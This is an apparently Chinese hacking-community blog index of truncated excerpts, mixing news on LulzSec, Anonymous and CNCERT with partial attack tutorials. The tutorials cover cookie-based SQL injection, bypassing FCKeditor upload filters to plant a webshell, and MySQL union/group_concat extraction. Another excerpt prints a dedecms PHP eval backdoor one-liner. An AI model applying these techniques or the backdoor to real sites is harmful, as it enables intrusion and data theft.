黑客组织LulzSec复出 公布17万军队成员账户

2011年的7月下旬,黑客组织LulzSec的一些成员被逮捕。该黑客组织曾于2011年在网站MilitarySingles.com上暴露了政府机构和公司成千上万个成员的电子邮件帐户,包括联邦调查局,中央情报局,索尼,甚至PBS。而似乎在沉寂了数个月后,LulzSec又有新动作,声称已经暴露近171,000个军队成员的帐户。   “这里有几份电子邮件,比如@us.army.mil carn...

- 阅读全文 -

Cookies注入步骤

Cookies注入步骤 1)寻找形如“*.asp?id=x”类的带参数的rul 2)去掉“id=x”查看页面显示是否正常。如果不正常,说明差数在数据传递中时直接起作用的 3)清空浏览器地址,输入“javascript:alert(document.cookie=“id=”+escape("x"));” 按Enter返回一个对话框,内容是“id=x”,然后用原来的url刷新页面,如果显示正常, 说明...

- 阅读全文 -

fckeditor上传突破_方法

有很多已经修补过的fckeditor 我们上传x.asp;y.jpg的时候 通常会变成x_asp;y.jpg 让我们的马失效   利用二次上传 可以 生成x(2).asp;y.jpg 可以突破 有些时候打了补丁的 让我们还是无法突破 通常 我们在www.webshell.cc/editor/FCKeditor/editor/filemanager/browser/default/brow...

- 阅读全文 -

php mysql注入的一种快速有效union方法select出数据库内容

php sql injector的时候,很多情况下都是显示一行一行的数据,要一次得到全部数据或者表格,那就的重复多次。   函数group_concat可以实现将表格放入一个单元格中(即仅有一行一列)   例如:   select group_concat(id,0x7c,name,0x7c,tel,0x5d) from g   那么将得到:   ...

- 阅读全文 -

dedecms 5.7 一句话后门利用 exp

author:舞林 tx微博:http://t.qq.com/wulinlw 晚上看到这个 http://www.wooyun.org/bug.php?action=view&id=5416 shopcar.class.php 被植入一句话 @eval(file_get_contents('php://input')); 去官网下了一套回来,看了下代码, class MemberShops...

- 阅读全文 -

在线渗透测试工具集合

家试试看吧,呵呵,不过下面那个破解wordpress密码的还能用 在线端口扫描: http://scan.subhashdasyam.com/port-scanner.php 在线VNC扫描: http://scan.subhashdasyam.com/dumper-with-login.php 在线SSH扫描: http://scan.subhashdasyam.com/ssh-scanner....

- 阅读全文 -

我国大陆去年2807个政府网站遭篡改

国家互联网应急中心(CNCERT)今天在此间发布的《2011年中国互联网网络安全态势报告》(以下简称“报告”)指出:2011年,我国遭受更为严重复杂的境外网络攻击,网络银行和工业控制系统安全收到的威胁显著上升,恶意程序引发的手机安全事件呈现多发态势。   ■ 境外攻击来源美国居首   报告指出,2011年,我国遭受境外网络攻击持续增多,境外有近4.7万个IP地址作为木马或僵尸网络控制服务器,控制我...

- 阅读全文 -

Anonymous宣称3月31日将使全球互联网瘫痪

名黑客组织匿名者(Anonymous)近日对外宣称,将于3月31日攻击13个DNS根服务器,已达到让全球互联网瘫痪的目的,此次攻击作为其发起的“Operation Global Blackout”行动的一部分,是为了抗议“SOPA(美国《网络反盗版法案》)和为了一己私利而置世界于饥饿之中的华尔街银行家与资本家们”。 SOPA/PIPA法案希望进一步强化保护知识产权的力度,当版权方发现侵犯版权内容时...

- 阅读全文 -

微软或其安全合作伙伴外泄恶性代码

去年有人向微软所提交的一个Windows系统高危漏洞代码现在不知怎么回事居然外泄了,但是目前还不知道通过微软自己还是它的安全合作伙伴之一外泄的。 这个漏洞针对的Windows远程桌面的一个弱点,使攻击者可以完全控制整个系统并且很容易扩散到其他电脑的远程桌面之上。 微软在本周早些时候曾为这个漏洞发布了一个补丁,但是仅仅在几天之后国内网站就爆出了一个被称为"rdpclient.exe"的程序文件。独立...

- 阅读全文 -

Anonymous 否认 Anonymous-OS 出自其手

之前曾被报道过的基于 Ubuntu11.10, 由匿名组织 Anonymous 制作的 Anonymous-OS 被证实并非出自 Anonymous 之手。由于无法确认作者,因此无法确认该操作系统的安全性。SourceForge 在该项目出现后关闭了此项目。也请下载了此 CD 的用户注意安全。   之前被众多网站所报道的 Anonymous-OS 自称是一个基于 Ubuntu 11.10...

- 阅读全文 -